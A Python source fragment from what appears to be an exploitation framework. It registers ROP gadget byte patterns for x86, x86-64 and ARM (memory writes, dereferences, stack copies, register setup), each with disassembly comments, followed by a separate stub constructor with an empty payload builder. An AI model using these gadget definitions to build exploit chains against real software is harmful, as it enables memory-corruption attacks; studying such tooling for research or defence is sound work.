    def __init__(self):
        """Register the gadget byte patterns this exploit class knows about.

        Every ``self.add_gadget(machine, name, count, pattern)`` call records one
        gadget -- a short instruction sequence, normally ending in a return -- for
        one target architecture, keyed by its ELF ``e_machine`` constant name
        (``EM_386``, ``EM_X86_64``, ``EM_ARM``).  ``pattern`` is a string of
        space-separated hex bytes; the trailing comment on each line is the
        disassembly of that line's bytes.  The meaning of ``count`` (4, 8, 6, 3
        or ``None`` below) is defined by ``add_gadget``, which is not visible in
        this listing -- confirm against its definition before relying on it.
        Registration order is preserved as written; the commented-out entries
        are alternatives the author chose not to register.
        """
        Exploit.__init__(self)

        # Good for FreeBSD

        # self.add_gadget("EM_386", "writemem", 4,
        #                 " 8b 44 24 08" + # mov    eax,DWORD PTR [esp+0x8] \
        #                 " 8b 4c 24 04" + # mov    ecx,DWORD PTR [esp+0x4] \
        #                 " 89 01" +       # mov    DWORD PTR [ecx],eax \
        #                 " c3")           # ret

        # self.add_gadget("EM_386", "cleanup", 3,
        #                 " 83 c4 0c" + # add    esp,0xc \
        #                 " c3")        # ret

        # Good for Linux

        self.add_gadget("EM_386", "writemem", 4,
                        " 8b 54 24 08" + # mov edx,DWORD PTR [esp+0x8] \
                        " 8b 44 24 04" + # mov eax,DWORD PTR [esp+0x4] \
                        " 89 10"       + # mov DWORD PTR [eax],edx \
                        " c3")           # ret

        # *(*(eax)+ecx) = ebx
        self.add_gadget("EM_386", "deref_write_with_offset", 4,
                        " 58"       + # pop eax \
                        " 5b"       + # pop ebx \
                        " 59"       + # pop ecx \
                        " 8b 00"    + # mov eax,DWORD PTR [eax] \
                        " 89 1c 08" + # mov DWORD PTR [eax+ecx*1],ebx \
                        " c3")        # ret

        # *(ecx) = *(*(eax)+ebx)
        self.add_gadget("EM_386", "deref_with_offset_and_save", 4,
                        " 58"       + # pop eax \
                        " 5b"       + # pop ebx \
                        " 59"       + # pop ecx \
                        " 8b 00"    + # mov eax,DWORD PTR [eax] \
                        " 8b 04 18" + # mov eax,DWORD PTR [eax+ebx*1] \
                        " 89 01"    + # mov DWORD PTR [ecx],eax \
                        " c3")        # ret

        self.add_gadget("EM_386", "copy_to_stack", 4,
                        " 5b"       + # pop ebx \
                        " 59"       + # pop ecx \
                        " 8b 1b"    + # mov ebx,DWORD PTR [ebx] \
                        " 89 1c 0c" + # mov DWORD PTR [esp+ecx*1],ebx \
                        " c3")        # ret

        self.add_gadget("EM_386", "cleanup", 4,
                        " 5b" + # pop ebx \
                        " 5e" + # pop esi \
                        " 5f" + # pop edi \
                        " 5d" + # pop ebp \
                        " c3")  # ret

        self.add_gadget("EM_386", "prepare_memcpy", 4,
                        " 58"       + # pop eax \
                        " 5e"       + # pop esi \
                        " 01 e6"    + # add esi,esp \
                        " 89 34 04" + # mov DWORD PTR [esp+eax*1],esi \
                        " c3")        # ret

        self.add_gadget("EM_386", "custom_cleanup", 4,
                        " 5b"       + # pop ebx \
                        " 01 dc"    + # add esp,ebx \
                        " c3")        # ret

        # This gadget requires 6 useless parameters

        self.add_gadget("EM_X86_64", "writemem", 8,
                        " 48 8b 54 24 10" + # mov rdx,QWORD PTR [rsp+0x10] \
                        " 48 8b 44 24 08" + # mov rax,QWORD PTR [rsp+0x8] \
                        " 48 89 10"       + # mov QWORD PTR [rax],rdx \
                        " c3")              # ret

        # NOTE(review): second "writemem" registration for EM_X86_64. Whether
        # add_gadget keeps both as alternatives or the later one replaces the
        # earlier is not visible here -- confirm against add_gadget.
        self.add_gadget("EM_X86_64", "writemem", 8,
                        " 48 89 37"       + # mov    QWORD PTR [rdi],rsi \
                        " c3")              # ret

        self.add_gadget("EM_X86_64", "cleanup", 6,
                        " 5b"    + # pop    rbx \
                        " 5d"    + # pop    rbp \
                        " 41 5c" + # pop    r12 \
                        " 41 5d" + # pop    r13 \
                        " 41 5e" + # pop    r14 \
                        " 41 5f" + # pop    r15 \
                        " c3")     # ret

        # Unlike the other x86-64 entries this pattern ends in an indirect
        # call rather than a ret, so there is no trailing "c3".
        self.add_gadget("EM_X86_64", "args", None,
                        " 4c 89 ea" +   # mov    rdx,r13 \
                        " 4c 89 f6" +   # mov    rsi,r14 \
                        " 44 89 ff" +   # mov    edi,r15d \
                        " 41 ff 14 dc") # call   QWORD PTR [r12+rbx*8]

        # *(*(rax)+rcx) = rbx  (64-bit counterpart of the EM_386 entry)
        self.add_gadget("EM_X86_64", "deref_write_with_offset", None,
                        " 58"          + # pop    rax \
                        " 5b"          + # pop    rbx \
                        " 59"          + # pop    rcx \
                        " 48 8b 00"    + # mov    rax,QWORD PTR [rax] \
                        " 48 89 1c 08" + # mov    QWORD PTR [rax+rcx*1],rbx \
                        " c3")           # ret

        # *(rcx) = *(*(rax)+rbx)  (64-bit counterpart of the EM_386 entry)
        self.add_gadget("EM_X86_64", "deref_with_offset_and_save", None,
                        " 58"          + # pop    rax \
                        " 5b"          + # pop    rbx \
                        " 59"          + # pop    rcx \
                        " 48 8b 00"    + # mov    rax,QWORD PTR [rax] \
                        " 48 8b 04 18" + # mov    rax,QWORD PTR [rax+rbx*1] \
                        " 48 89 01"    + # mov    QWORD PTR [rcx],rax \
                        " c3")           # ret

        self.add_gadget("EM_X86_64", "copy_to_stack", None,
                        " 5b"          + # pop    rbx \
                        " 59"          + # pop    rcx \
                        " 48 8b 1b"    + # mov    rbx,QWORD PTR [rbx] \
                        " 48 89 1c 0c" + # mov    QWORD PTR [rsp+rcx*1],rbx \
                        " c3")           # ret

        self.add_gadget("EM_X86_64", "prepare_memcpy", None,
                        " 5e"       + # pop    rsi \
                        " 48 01 e6" + # add    rsi,rsp \
                        " c3")        # ret

        self.add_gadget("EM_X86_64", "custom_cleanup", None,
                        " 58"       + # pop    rax \
                        " 48 01 c4" + # add    rsp,rax \
                        " c3")        # ret

        self.add_gadget("EM_X86_64", "prepare_easy", None,
                        " 5f"       + # pop    rdi \
                        " 5e"       + # pop    rsi \
                        " 5a"       + # pop    rdx \
                        " c3")        # ret

        # Assume LE: the ARM encodings below are written in little-endian
        # byte order (e.g. "00 10 80 e5" is the word 0xe5801000).

        self.add_gadget("EM_ARM", "writemem", 4,
                        " 00 10 80 e5" + # str r1, [r0] \
                        " 1e ff 2f e1")  # bx lr

        # Better not use this due to a bug in QEMU

        #self.add_gadget("EM_ARM", "prepare_regs", None,
        #                " f8 85 bd e8")  # pop {r3, r4, r5, r6, r7, r8, sl, pc}

        # Same pop as above but with the EQ condition code (0x08 vs 0xe8 in
        # the top byte), so it only executes when the Z flag is set.
        self.add_gadget("EM_ARM", "prepare_regs", None,
                        " f8 85 bd 08")  # popeq {r3, r4, r5, r6, r7, r8, sl, pc}

        self.add_gadget("EM_ARM", "setup_args", None,
                        " 07 00 a0 e1" + # mov r0, r7 \
                        " 08 10 a0 e1" + # mov r1, r8 \
                        " 0a 20 a0 e1" + # mov r2, sl \
                        " 01 40 84 e2" + # add r4, r4, #1 \
                        " 33 ff 2f e1" + # blx r3 \
                        " 06 00 54 e1" + # cmp r4, r6 \
                        " f7 ff ff 1a" + # bne 8604 <__libc_csu_init+0x38> \
                        " f8 85 bd e8")  # pop {r3, r4, r5, r6, r7, r8, sl, pc}

        self.add_gadget("EM_ARM", "just_ret", None,
                        " 1e ff 2f e1")  # bx      lr
 def __init__(self):
     """Initialise the base Exploit and install a no-op payload builder.

     ``self.empty_exploit`` is a zero-argument callable returning a fresh
     empty list each time it is invoked.
     """
     Exploit.__init__(self)

     def _no_payload():
         # A new list per call so callers never share a mutable instance.
         return []

     self.empty_exploit = _no_payload